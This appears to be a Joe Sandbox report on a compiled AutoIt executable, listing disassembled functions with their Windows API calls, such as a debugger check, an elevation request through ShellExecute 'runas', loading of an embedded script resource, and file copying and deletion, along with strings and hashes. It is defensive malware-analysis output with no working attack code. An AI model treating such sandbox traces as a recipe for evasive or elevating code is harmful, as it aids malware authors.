__ftell_nolock 58 API calls 100589->100593 100598 a8dac6 100589->100598 100626 a8b05e 100589->100626 100649 a84c6d 100589->100649 100597 a84b0d LeaveCriticalSection LeaveCriticalSection _fseek 100592->100597 100593->100589 100595->100578 100596->100575 100597->100575 100599 a8dad2 __initptd 100598->100599 100600 a8dadf 100599->100600 100601 a8daf6 100599->100601 100602 a88d34 __chsize_nolock 58 API calls 100600->100602 100603 a8db95 100601->100603 100604 a8db0a 100601->100604 100606 a8dae4 100602->100606 100605 a88d34 __chsize_nolock 58 API calls 100603->100605 100607 a8db28 100604->100607 100608 a8db32 100604->100608 100609 
a8db2d 100605->100609 100610 a88d68 __ftell_nolock 58 API calls 100606->100610 100611 a88d34 __chsize_nolock 58 API calls 100607->100611 100612 a8d446 ___lock_fhandle 59 API calls 100608->100612 100614 a88d68 __ftell_nolock 58 API calls 100609->100614 100623 a8daeb __initptd 100610->100623 100611->100609 100613 a8db38 100612->100613 100615 a8db4b 100613->100615 100616 a8db5e 100613->100616 100617 a8dba1 100614->100617 100618 a8dbb5 __write_nolock 76 API calls 100615->100618 100620 a88d68 __ftell_nolock 58 API calls 100616->100620 100619 a88ff6 __ftell_nolock 9 API calls 100617->100619 100621 a8db57 100618->100621 100619->100623 100622 a8db63 100620->100622 100625 a8db8d __write LeaveCriticalSection 100621->100625 100624 a88d34 __chsize_nolock 58 API calls 100622->100624 100623->100589 100624->100621 100625->100623 100627 a84916 __ftell_nolock 58 API calls 100626->100627 100628 a8b06c 100627->100628 100629 a8b08e 100628->100629 100630 a8b077 100628->100630 100632 a8b093 100629->100632 100640 a8b0a0 __flswbuf 100629->100640 100631 a88d68 __ftell_nolock 58 API calls 100630->100631 100634 a8b07c 100631->100634 100633 a88d68 __ftell_nolock 58 API calls 100632->100633 100633->100634 100634->100589 100635 a8b17e 100637 a8dac6 __write 78 API calls 100635->100637 100636 a8b104 100638 a8b11e 100636->100638 100641 a8b135 100636->100641 100637->100634 100639 a8dac6 __write 78 API calls 100638->100639 100639->100634 100640->100634 100642 a95ebb __flswbuf 58 API calls 100640->100642 100643 a8b0ef 100640->100643 100646 a8b0fa 100640->100646 100641->100634 100644 a91a15 __lseeki64 62 API calls 100641->100644 100642->100643 100645 a96234 __getbuf 58 API calls 100643->100645 100643->100646 100644->100634 100645->100646 100646->100635 100646->100636 100647->100587 100648->100592 100650 a84c80 100649->100650 100651 a84ca4 100649->100651 100650->100651 100652 a84916 __ftell_nolock 58 API calls 100650->100652 100651->100589 100653 a84c9d 100652->100653 100654 a8dac6 __write 78 API calls 
100653->100654 100654->100651 100656 a85579 100655->100656 100657 a8558d 100655->100657 100704 a88d68 58 API calls __getptd_noexit 100656->100704 100660 a84c6d __flush 78 API calls 100657->100660 100663 a85589 100657->100663 100659 a8557e 100705 a88ff6 9 API calls __ftell_nolock 100659->100705 100662 a85599 100660->100662 100674 a90dc7 100662->100674 100673 a85645 LeaveCriticalSection LeaveCriticalSection _fseek 100663->100673 100666 a84916 __ftell_nolock 58 API calls 100667 a855a7 100666->100667 100678 a90c52 100667->100678 100669 a855ad 100669->100663 100670 a82f95 _free 58 API calls 100669->100670 100670->100663 100671->100557 100672->100560 100673->100560 100675 a855a1 100674->100675 100676 a90dd4 100674->100676 100675->100666 100676->100675 100677 a82f95 _free 58 API calls 100676->100677 100677->100675 100679 a90c5e __initptd 100678->100679 100680 a90c6b 100679->100680 100681 a90c82 100679->100681 100730 a88d34 58 API calls __getptd_noexit 100680->100730 100683 a90d0d 100681->100683 100685 a90c92 100681->100685 100735 a88d34 58 API calls __getptd_noexit 100683->100735 100684 a90c70 100731 a88d68 58 API calls __getptd_noexit 100684->100731 100688 a90cba 100685->100688 100689 a90cb0 100685->100689 100706 a8d446 100688->100706 100732 a88d34 58 API calls __getptd_noexit 100689->100732 100690 a90cb5 100736 a88d68 58 API calls __getptd_noexit 100690->100736 100692 a90c77 __initptd 100692->100669 100695 a90cc0 100697 a90cde 100695->100697 100698 a90cd3 100695->100698 100696 a90d19 100737 a88ff6 9 API calls __ftell_nolock 100696->100737 100733 a88d68 58 API calls __getptd_noexit 100697->100733 100715 a90d2d 100698->100715 100702 a90cd9 100734 a90d05 LeaveCriticalSection __unlock_fhandle 100702->100734 100704->100659 100705->100663 100707 a8d452 __initptd 100706->100707 100708 a8d4a1 EnterCriticalSection 100707->100708 100709 a89e4b __lock 58 API calls 100707->100709 100710 a8d4c7 __initptd 100708->100710 100711 a8d477 100709->100711 100710->100695 100712 a8d48f 
100711->100712 100738 a8a06b InitializeCriticalSectionAndSpinCount 100711->100738 100739 a8d4cb LeaveCriticalSection _doexit 100712->100739 100740 a8d703 100715->100740 100717 a90d91 100753 a8d67d 59 API calls 2 library calls 100717->100753 100718 a90d3b 100718->100717 100720 a90d6f 100718->100720 100723 a8d703 __chsize_nolock 58 API calls 100718->100723 100720->100717 100721 a8d703 __chsize_nolock 58 API calls 100720->100721 100724 a90d7b FindCloseChangeNotification 100721->100724 100722 a90d99 100725 a90dbb 100722->100725 100754 a88d47 58 API calls 3 library calls 100722->100754 100726 a90d66 100723->100726 100724->100717 100727 a90d87 GetLastError 100724->100727 100725->100702 100729 a8d703 __chsize_nolock 58 API calls 100726->100729 100727->100717 100729->100720 100730->100684 100731->100692 100732->100690 100733->100702 100734->100692 100735->100690 100736->100696 100737->100692 100738->100712 100739->100708 100741 a8d70e 100740->100741 100742 a8d723 100740->100742 100743 a88d34 __chsize_nolock 58 API calls 100741->100743 100745 a88d34 __chsize_nolock 58 API calls 100742->100745 100747 a8d748 100742->100747 100744 a8d713 100743->100744 100746 a88d68 __ftell_nolock 58 API calls 100744->100746 100748 a8d752 100745->100748 100750 a8d71b 100746->100750 100747->100718 100749 a88d68 __ftell_nolock 58 API calls 100748->100749 100751 a8d75a 100749->100751 100750->100718 100752 a88ff6 __ftell_nolock 9 API calls 100751->100752 100752->100750 100753->100722 100754->100725 100817 a91b90 100755->100817 100758 a648f7 100819 a67eec 100758->100819 100759 a648da 100760 a67d2c 59 API calls 100759->100760 100762 a648e6 100760->100762 100763 a67886 59 API calls 100762->100763 100764 a648f2 100763->100764 100765 a809d5 100764->100765 100766 a91b90 __ftell_nolock 100765->100766 100767 a809e2 GetLongPathNameW 100766->100767 100768 a67d2c 59 API calls 100767->100768 100769 a6741d 100768->100769 100770 a6716b 100769->100770 100771 a677c7 59 API calls 100770->100771 100772 a6717d 

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A63B7A
                                                      • IsDebuggerPresent.KERNEL32 ref: 00A63B8C
                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00B262F8,00B262E0,?,?), ref: 00A63BFD
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                        • Part of subcall function 00A70A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A63C26,00B262F8,?,?,?), ref: 00A70ACE
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A63C81
                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00B193F0,00000010), ref: 00A9D4BC
                                                      • SetCurrentDirectoryW.KERNEL32(?,00B262F8,?,?,?), ref: 00A9D4F4
                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B15D40,00B262F8,?,?,?), ref: 00A9D57A
                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00A9D581
                                                        • Part of subcall function 00A63A58: GetSysColorBrush.USER32(0000000F), ref: 00A63A62
                                                        • Part of subcall function 00A63A58: LoadCursorW.USER32(00000000,00007F00), ref: 00A63A71
                                                        • Part of subcall function 00A63A58: LoadIconW.USER32(00000063), ref: 00A63A88
                                                        • Part of subcall function 00A63A58: LoadIconW.USER32(000000A4), ref: 00A63A9A
                                                        • Part of subcall function 00A63A58: LoadIconW.USER32(000000A2), ref: 00A63AAC
                                                        • Part of subcall function 00A63A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A63AD2
                                                        • Part of subcall function 00A63A58: RegisterClassExW.USER32(?), ref: 00A63B28
                                                        • Part of subcall function 00A639E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A63A15
                                                        • Part of subcall function 00A639E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A63A36
                                                        • Part of subcall function 00A639E7: ShowWindow.USER32(00000000,?,?), ref: 00A63A4A
                                                        • Part of subcall function 00A639E7: ShowWindow.USER32(00000000,?,?), ref: 00A63A53
                                                        • Part of subcall function 00A643DB: _memset.LIBCMT ref: 00A64401
                                                        • Part of subcall function 00A643DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A644A6
                                                      Strings
                                                      • This is a third-party compiled AutoIt script., xrefs: 00A9D4B4
                                                      • runas, xrefs: 00A9D575
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                      • API String ID: 529118366-3287110873
                                                      • Opcode ID: dd8e27389eff7514fc7523ddd3e8a2baf53d62349d109cdff653703828923832
                                                      • Instruction ID: 7aaca1d6ea0e65078898542011ed76224f2392f0d72b6c6a1e19ec81a4ecc141
                                                      • Opcode Fuzzy Hash: dd8e27389eff7514fc7523ddd3e8a2baf53d62349d109cdff653703828923832
                                                      • Instruction Fuzzy Hash: 4751E432A04289EECF21EBB4ED55EFD7BB8AF44304F0040A5F865A71A1DE705A47CB21

                                                      Control-flow Graph

                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 00A64B2B
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                      • GetCurrentProcess.KERNEL32(?,00AEFAEC,00000000,00000000,?), ref: 00A64BF8
                                                      • IsWow64Process.KERNEL32(00000000), ref: 00A64BFF
                                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00A64C45
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00A64C50
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00A64C81
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00A64C8D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                      • String ID:
                                                      • API String ID: 1986165174-0
                                                      • Opcode ID: faf8efa214427ede146e3b46072e15d47f61d968ba12834b30a3b42aa751d1c5
                                                      • Instruction ID: b9acebd254e8959b01e505f71cb38e64f356933062ad5d671745c68789046551
                                                      • Opcode Fuzzy Hash: faf8efa214427ede146e3b46072e15d47f61d968ba12834b30a3b42aa751d1c5
                                                      • Instruction Fuzzy Hash: 7991C47154ABC4DECB31DB7885511AAFFF4AF2A300B484E9ED0CB97B41D220E948D769

                                                      Control-flow Graph (graph figure for function a64fe9 not reproduced; executed and not-executed blocks were shown in colour)
                                                      APIs
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A64EEE,?,?,00000000,00000000), ref: 00A64FF9
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A64EEE,?,?,00000000,00000000), ref: 00A65010
                                                      • LoadResource.KERNEL32(?,00000000,?,?,00A64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00A64F8F), ref: 00A9DD60
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00A64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00A64F8F), ref: 00A9DD75
                                                      • LockResource.KERNEL32(00A64EEE,?,?,00A64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00A64F8F,00000000), ref: 00A9DD88
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: 43f89f416ba0ade9ad0a149ced36185c61ae7e9e4363b98feb5c371e9b6b8fd5
                                                      • Instruction ID: 3d9929926fc3aefba9baa8290f0f013779ccb72ec5aa724a10389b355b9bb808
                                                      • Opcode Fuzzy Hash: 43f89f416ba0ade9ad0a149ced36185c61ae7e9e4363b98feb5c371e9b6b8fd5
                                                      • Instruction Fuzzy Hash: 5F117C75600741BFD7218B65DC98F677BB9EBC9B51F20856CF506CA260DB71EC018660
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00A9E7C1), ref: 00AC46A6
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00AC46B7
                                                      • FindClose.KERNEL32(00000000), ref: 00AC46C7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirst
                                                      • String ID:
                                                      • API String ID: 48322524-0
                                                      • Opcode ID: f9e198bc3e232cee26e20e3e77ad3f6a55ad3775646c7877e342c7d02844bed5
                                                      • Instruction ID: 567e01cbd3990ece9421be4c9a5676a4eea62f19acf859c2cbee61adaf8a6ba6
                                                      • Opcode Fuzzy Hash: f9e198bc3e232cee26e20e3e77ad3f6a55ad3775646c7877e342c7d02844bed5
                                                      • Instruction Fuzzy Hash: C6E0D8318149005F4210A778EC9D8EA775CDE0A335F100719F935C50E0E7B05D508699
                                                      Strings
                                                      • Variable must be of type 'Object'., xrefs: 00AA428C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable must be of type 'Object'.
                                                      • API String ID: 0-109567571
                                                      • Opcode ID: b41a069ca46b5403eac120d3d2a024e26f8f3ea444b2b490927701bb90e1d075
                                                      • Instruction ID: 267af49e6e778c01fce3ba8cfd561bb0514476cae54963a81da785cafcb6c9c1
                                                      • Opcode Fuzzy Hash: b41a069ca46b5403eac120d3d2a024e26f8f3ea444b2b490927701bb90e1d075
                                                      • Instruction Fuzzy Hash: CDA2BF79A04205CFCF24CF98C980AAEB7B1FF59304F248169E916AB391D775ED42CB91
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A70BBB
                                                      • timeGetTime.WINMM ref: 00A70E76
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A70FB3
                                                      • TranslateMessage.USER32(?), ref: 00A70FC7
                                                      • DispatchMessageW.USER32(?), ref: 00A70FD5
                                                      • Sleep.KERNEL32(0000000A), ref: 00A70FDF
                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00A7105A
                                                      • DestroyWindow.USER32 ref: 00A71066
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A71080
                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00AA52AD
                                                      • TranslateMessage.USER32(?), ref: 00AA608A
                                                      • DispatchMessageW.USER32(?), ref: 00AA6098
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00AA60AC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                      • API String ID: 4003667617-3242690629
                                                      • Opcode ID: 333cbde219132dd29693a7fbdf4baeb0e0861ac1890deefb56f4c669e12c8b6a
                                                      • Instruction ID: 56eccb4293b4899fce3bb3c603c83d4716c5ef6a5813b3e4f3200a72befc2c43
                                                      • Opcode Fuzzy Hash: 333cbde219132dd29693a7fbdf4baeb0e0861ac1890deefb56f4c669e12c8b6a
                                                      • Instruction Fuzzy Hash: 16B2BD70A08741DFD724DF24C984FAAB7F5BF85304F14891DE48A872A1DB75E885CB86

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00AC91E9: __time64.LIBCMT ref: 00AC91F3
                                                        • Part of subcall function 00A65045: _fseek.LIBCMT ref: 00A6505D
                                                      • __wsplitpath.LIBCMT ref: 00AC94BE
                                                        • Part of subcall function 00A8432E: __wsplitpath_helper.LIBCMT ref: 00A8436E
                                                      • _wcscpy.LIBCMT ref: 00AC94D1
                                                      • _wcscat.LIBCMT ref: 00AC94E4
                                                      • __wsplitpath.LIBCMT ref: 00AC9509
                                                      • _wcscat.LIBCMT ref: 00AC951F
                                                      • _wcscat.LIBCMT ref: 00AC9532
                                                        • Part of subcall function 00AC922F: _memmove.LIBCMT ref: 00AC9268
                                                        • Part of subcall function 00AC922F: _memmove.LIBCMT ref: 00AC9277
                                                      • _wcscmp.LIBCMT ref: 00AC9479
                                                        • Part of subcall function 00AC99BE: _wcscmp.LIBCMT ref: 00AC9AAE
                                                        • Part of subcall function 00AC99BE: _wcscmp.LIBCMT ref: 00AC9AC1
                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AC96DC
                                                      • _wcsncpy.LIBCMT ref: 00AC974F
                                                      • DeleteFileW.KERNEL32(?,?), ref: 00AC9785
                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AC979B
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AC97AC
                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AC97BE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                      • String ID:
                                                      • API String ID: 1500180987-0
                                                      • Opcode ID: c053fceba2098865fd9b5a41aca01c2400dc44ce7549abd69114030084ff6b68
                                                      • Instruction ID: 6a1d0ec09afe69f532900932594765b799403939a457e162312bf9ea1b90117f
                                                      • Opcode Fuzzy Hash: c053fceba2098865fd9b5a41aca01c2400dc44ce7549abd69114030084ff6b68
                                                      • Instruction Fuzzy Hash: CEC108B1D00229AEDF21DFA5CD85EDFB7BDAF45310F0040AAF609E6151EB709A848F65

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00A63074
                                                      • RegisterClassExW.USER32(00000030), ref: 00A6309E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A630AF
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00A630CC
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A630DC
                                                      • LoadIconW.USER32(000000A9), ref: 00A630F2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A63101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: da79af444e8d69700ebdc352d076c3815b51cda4ceaf4eabd6a25d8b290af0d7
                                                      • Instruction ID: 8c3bdcb9efe56b6e0d1fcb626279449121b1fb7e42477cd622126a08582b22e2
                                                      • Opcode Fuzzy Hash: da79af444e8d69700ebdc352d076c3815b51cda4ceaf4eabd6a25d8b290af0d7
                                                      • Instruction Fuzzy Hash: 4C31E7B1940389EFDB50DFA4D889A89BBF4FB09310F14452AE590EA290E7B54586CF51

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00A63074
                                                      • RegisterClassExW.USER32(00000030), ref: 00A6309E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A630AF
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00A630CC
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A630DC
                                                      • LoadIconW.USER32(000000A9), ref: 00A630F2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A63101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: 1c308885ece03902e5455718bb5ca3a3af00906788533ef4f486c29856f8d32c
                                                      • Instruction ID: 69e1fc68d6ebbc5349f4887e14c9cf08c2992a9770a8f7c5a16ba3efb04aed4b
                                                      • Opcode Fuzzy Hash: 1c308885ece03902e5455718bb5ca3a3af00906788533ef4f486c29856f8d32c
                                                      • Instruction Fuzzy Hash: 8021C5B1D11258EFDB10DFE4E889B9DBBF4FB08700F00812AF910AB2A0DBB545458F91

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00A64864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B262F8,?,00A637C0,?), ref: 00A64882
                                                        • Part of subcall function 00A8074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00A672C5), ref: 00A80771
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A67308
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A9ECF1
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A9ED32
                                                      • RegCloseKey.ADVAPI32(?), ref: 00A9ED70
                                                      • _wcscat.LIBCMT ref: 00A9EDC9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
